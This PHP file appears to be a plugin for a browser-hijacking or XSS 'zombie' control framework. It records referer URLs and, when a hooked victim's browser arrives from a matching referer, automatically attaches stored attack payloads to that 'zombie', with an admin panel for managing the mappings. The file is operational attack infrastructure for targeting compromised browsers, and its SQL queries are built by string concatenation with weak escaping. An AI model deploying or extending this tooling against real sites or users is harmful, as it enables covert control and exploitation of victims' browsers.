<?php

   if(!defined('ANTIBUG')) exit;
   
   require_once(PLOUF_PATH.'Database.php');
   require_once(PLOUF_PATH.'PluginModule.php');
   
   class referer_attack extends PluginModule implements PluginInterface
   {
      public $description='Automatically attach a zombie to certain payloads if comes from a certain referer';
      
      private $Database;
      
      public function __construct()
      {
         parent::__construct();
         $this->Database=Database::getInstance();
      }
      
      /*
       * Installs the plugin
       */
      public function install()
      {
         $SQLQuery="CREATE TABLE IF NOT EXISTS plu_referer (
            id    INTEGER UNSIGNED NOT NULL AUTO_INCREMENT,
            url   TEXT NOT NULL,
            PRIMARY KEY (id)
         ) TYPE=InnoDB";
         $this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
         
         $SQLQuery="CREATE TABLE IF NOT EXISTS plu_referer_payload (
            id INTEGER UNSIGNED NOT NULL AUTO_INCREMENT,
            payload_id INTEGER UNSIGNED NOT NULL,
            referer_id INTEGER UNSIGNED NOT NULL,
            PRIMARY KEY (id),
            FOREIGN KEY (referer_id) REFERENCES plu_referer (id)
               ON DELETE CASCADE
               ON UPDATE CASCADE,
            FOREIGN KEY (payload_id) REFERENCES payload (id)
               ON DELETE CASCADE
               ON UPDATE CASCADE
         ) TYPE=InnoDB";
         
         $this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
      }
      
      /*
       * Removes the plugin
       */
      public function remove()
      {
         $SQLQuery="DROP TABLE IF EXISTS plu_referer_payload, plu_referer";
         $this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
      }
      
      /*
       * Runs the plugin's algorithm
       */
      public function run()
      {
         $referer=$this->http->getHttpreferer();
         
         if($referer!=false)
         {
            $SQLQuery="SELECT url FROM plu_referer";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            if($this->Database->numRows($Query)!=0)
            {
               while($url=$this->Database->fetchAssoc($Query))
               {
                  if(strstr($referer, $url['url'])!=false)
                  {
                     $url=addslashes($url['url']);
                     $SQLQuery="SELECT payload.name FROM plu_referer_payload
                        INNER JOIN payload ON payload.id = plu_referer_payload.payload_id
                        INNER JOIN plu_referer ON plu_referer.id = plu_referer_payload.referer_id
                        WHERE plu_referer.url = '$url'";
                     $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
                     if($this->Database->numRows($Query)!=0)
                     {
                        while($payload=$this->Database->fetchAssoc($Query))
                        {
                           $payload=$payload['name'];
                           $zombie=Zombie::getInstance();
                           if(!in_array($payload, $zombie->getPayloads()))
                           {
                              $zombie->attachPayload($payload);
                           }
                        }
                     }
                  }
               }
            }
         }
      }
      
      /*
       * Manages the plugin in the administration panel
       */
      public function main()
      {
         $action=$this->http->getCleanString('action', 'post');
         if($action==false)
            $action=$this->http->getCleanString('action');
         
         /* adds a new referer */
         if($action=='new_referer' && ($referer=$this->http->getVar('referer', 'post')) && !empty($referer))
         {
            $referer=addslashes($referer);
            $SQLQuery="SELECT id FROM plu_referer WHERE url='$referer'";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            
            if($this->Database->numRows($Query)==0)
            {
               $SQLQuery="INSERT INTO plu_referer (url) VALUES ('$referer')";
               $this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            }
            else
            {
               $this->setRenderData('Duplicatereferer', 1);
            }
         }
         /* adds a new payload */
         if($action=='add_payload' && ($payload=$this->http->getCleanString('payload', 'post')) && ($referer=$this->http->getVar('referer', 'post')))
         {
            //we check that the payload exists
            $SQLQuery="SELECT id FROM payload WHERE name='$payload'";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            if($this->Database->numRows($Query)!=0)
               $payload_id=$this->Database->fetchResult($Query, 0);
               
            //we check that the referer exists
            $referer=html_entity_decode($referer);
            $referer=addslashes($referer);
            $SQLQuery="SELECT id FROM plu_referer WHERE url='$referer'";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            if($this->Database->numRows($Query)!=0)
               $referer_id=$this->Database->fetchResult($Query, 0);
               
            //we check that the payload is not already attach to this referer (avoid doublons)
            if(isset($payload_id) && isset($referer_id))
            {
               $payload_id=intval($payload_id);
               $referer_id=intval($referer_id);
               
               $SQLQuery="SELECT id FROM plu_referer_payload WHERE payload_id='$payload_id' AND referer_id='$referer_id'";
               $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
               if($this->Database->numRows($Query)==0)
               {
                  $SQLQuery="INSERT INTO plu_referer_payload (payload_id, referer_id) VALUES ($payload_id, $referer_id)";
                  $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
               }
               else
               {
                  $this->setRenderData('RelationrefererPayloadExists', true);
               }
            }
            else
            {
               $this->setRenderData('InvalidrefererOrPayload', true);
            }
         }
         
         /*  removes a referer */
         if($action=='remove_referer' && $referer=$this->http->getCleanString('name'))
         {
            $SQLQuery="DELETE FROM plu_referer WHERE url='$referer'";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
         }
         
         /* removes a payload */
         if($action=='remove_payload' && $payload=$this->http->getCleanString('name'))
         {
            $SQLQuery="SELECT id FROM payload WHERE name='$payload'";
            $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            
            if($this->Database->numRows($Query)!=0 && $id=$this->Database->fetchResult($Query, 0))
            {
               $id=intval($id);
               $SQLQuery="DELETE FROM plu_referer_payload WHERE payload_id='$id'";
               $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
            }
         }
         
         /* display the list of referers and payloads attach to them */
         $SQLQuery="SELECT id, url FROM plu_referer";
         $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
         if($this->Database->numRows($Query)!=0)
         {
            $referers=array();
            while($referer=$this->Database->fetchAssoc($Query))
            {
               $id=intval($referer['id']);
               $SQLQuery="SELECT payload.name FROM plu_referer_payload
                  INNER JOIN payload ON plu_referer_payload.payload_id = payload.id
                  INNER JOIN plu_referer ON plu_referer_payload.referer_id = plu_referer.id
                  WHERE plu_referer_payload.referer_id='$id'";
               $SQL=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
               
               if($this->Database->numRows($SQL)!=0)
               {
                  $referer['payloads']=array();
                  while($payload=$this->Database->fetchAssoc($SQL))
                  {
                     array_push($referer['payloads'], $payload['name']);
                  }
               }
               
               array_push($referers, $referer);
            }
            
            $this->setRenderData('referers', $referers);
         }
         
         /* we get the list of all the installed payloads */
         $SQLQuery="SELECT name FROM payload";
         $Query=$this->Database->query($SQLQuery) or $this->Database->dieError(__FILE__,__LINE__);
         if($this->Database->numRows($Query)!=0)
         {
            $payloads=array();
            while($payload=$this->Database->fetchAssoc($Query))
            {
               array_push($payloads, $payload['name']);
            }
            
            $this->setRenderData('payloads', $payloads);
         }
      }
   }
   
?>
